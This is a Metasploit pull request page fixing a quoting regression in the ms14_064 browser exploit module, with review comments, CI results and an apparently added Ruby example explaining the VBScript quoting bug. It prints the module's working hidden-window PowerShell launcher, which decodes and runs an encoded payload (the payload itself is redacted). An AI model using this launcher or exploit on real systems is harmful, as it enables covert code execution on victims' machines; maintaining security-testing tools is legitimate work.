
Regression fix: Disabling wrap_double_quotes #11842

Merged
merged 3 commits into from May 16, 2019

4 participants
@pr4tik (Contributor) commented May 16, 2019

This client-side exploit stopped working in current MSF; it throws an error in the client browser. As per the analysis, it's because of Powershell::wrap_double_quotes=true.
I have just added "Powershell::wrap_double_quotes" as an advanced option to override the datastore value.

Error when Powershell::wrap_double_quotes is set to true:
shell.ShellExecute "powershell.exe", "-nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''**<REDACTED>**''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"", "", "open", 0 end function

[screenshots: MSF output error, browser error, view-source error]

Working POC

If the "Powershell::wrap_double_quotes" value is set to false, this exploit works.
Working payload:
shell.ShellExecute "powershell.exe", "-nop -w hidden -noni -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''**<REDACTED>**''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);", "", "open", 0 end function

[screenshot: working exploit]

I have tested this multiple times and it works.

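To make the quoting failure visible in the two outputs above concrete, here is an added Ruby example; it is not Metasploit's code and does not reproduce the module's generator. It models the generated `shell.ShellExecute` line, parses it with VBScript's string-literal rules (a `"` inside a literal must be doubled as `""`), and checks whether the PowerShell argument string survives as one intact literal. The helpers `build_ps_args`, `vbscript_line`, `vbscript_literals`, `vbscript_escape` and `argument_intact?` are hypothetical names, and the `if($x){1}` command is a constructed stand-in for the real payload.

```ruby
# Added example (not Metasploit's code): why wrapping the PowerShell command
# in double quotes breaks the generated VBScript line, and why either not
# wrapping (the PR's fix) or escaping the quotes for VBScript restores it.

# Build the PowerShell argument string the way the two outputs in the PR
# differ: with wrap_double_quotes the -c command is enclosed in "...".
# (Modelled on the PR's output, not on Metasploit's actual generator.)
def build_ps_args(command, wrap_double_quotes:)
  cmd = wrap_double_quotes ? "\"#{command}\"" : command
  "-nop -w hidden -noni -c #{cmd}"
end

# VBScript escapes a double quote inside a string literal by doubling it.
def vbscript_escape(s)
  s.gsub('"', '""')
end

# Emit the ShellExecute call with the argument embedded as a string literal.
# escape: false reproduces the PR's output (nothing is escaped).
def vbscript_line(ps_args, escape: false)
  embedded = escape ? vbscript_escape(ps_args) : ps_args
  %(shell.ShellExecute "powershell.exe", "#{embedded}", "", "open", 0)
end

# Parse the string literals on one VBScript line, in order. Returns their
# contents, or nil if a literal is unterminated. "" inside a literal is an
# escaped quote; a lone " ends the literal, which is exactly the defect.
def vbscript_literals(line)
  literals = []
  i = 0
  while i < line.length
    if line[i] == '"'
      buf = +''
      i += 1
      loop do
        return nil if i >= line.length          # unterminated literal
        if line[i] == '"'
          if line[i + 1] == '"'                 # escaped quote
            buf << '"'
            i += 2
          else
            i += 1                              # closing quote
            break
          end
        else
          buf << line[i]
          i += 1
        end
      end
      literals << buf
    else
      i += 1                                    # text outside literals
    end
  end
  literals
end

# The check: is the whole PowerShell argument string carried as the second
# literal of the ShellExecute call, the way the script engine would read it?
def argument_intact?(command, wrap_double_quotes:, escape: false)
  args = build_ps_args(command, wrap_double_quotes: wrap_double_quotes)
  lits = vbscript_literals(vbscript_line(args, escape: escape))
  !lits.nil? && lits[1] == args
end

if __FILE__ == $0
  sample = 'if($x){1}'   # constructed stand-in for the module's command
  puts "wrapped, unescaped: #{argument_intact?(sample, wrap_double_quotes: true)}"                 # false
  puts "unwrapped:          #{argument_intact?(sample, wrap_double_quotes: false)}"                # true
  puts "wrapped, escaped:   #{argument_intact?(sample, wrap_double_quotes: true, escape: true)}"   # true
end
```

With `wrap_double_quotes: true` the unescaped line splits into `"-nop -w hidden -noni -c "` followed by bare text, so the second literal no longer holds the command; the PR's `DefaultOptions` change avoids the inner quotes altogether, while `escape: true` shows the other way the embedding could have been made safe.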

@bcoles bcoles added bug module labels May 16, 2019


@bcoles (Contributor) commented May 16, 2019

Thanks for the patch.

Is this the best way to fix it? @wvu-r7

@wvu-r7 (Contributor) left a review comment

I would do something like this:

'DefaultOptions' => {'Powershell::wrap_double_quotes' => false}
Removed register_advanced_options
Added 'Powershell::wrap_double_quotes' => false in DefaultOptions.
@pr4tik (Contributor, Author) commented May 16, 2019

I would do something like this:

'DefaultOptions' => {'Powershell::wrap_double_quotes' => false}

I have modified the code.
However, I'm getting an error in CI (travis-ci).

@wvu-r7 wvu-r7 self-assigned this May 16, 2019

wvu-r7 (Contributor) approved these changes May 16, 2019 and left a comment

Build should pass now.

@wvu-r7 wvu-r7 merged commit 328b4fa into rapid7:master May 16, 2019

3 checks passed:
- Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
- Metasploit Automation - Test Execution: Successfully completed all tests.
- continuous-integration/travis-ci/pr: The Travis CI build passed.

wvu-r7 added a commit that referenced this pull request May 16, 2019

@wvu-r7 (Contributor) commented May 16, 2019

Release Notes

This changes Powershell::wrap_double_quotes to false in exploit/windows/browser/ms14_064_ole_code_execution in order to fix a regression in functionality.

msjenkins-r7 added a commit that referenced this pull request May 16, 2019

@gdavidson-r7 gdavidson-r7 added the rn-fix label May 29, 2019
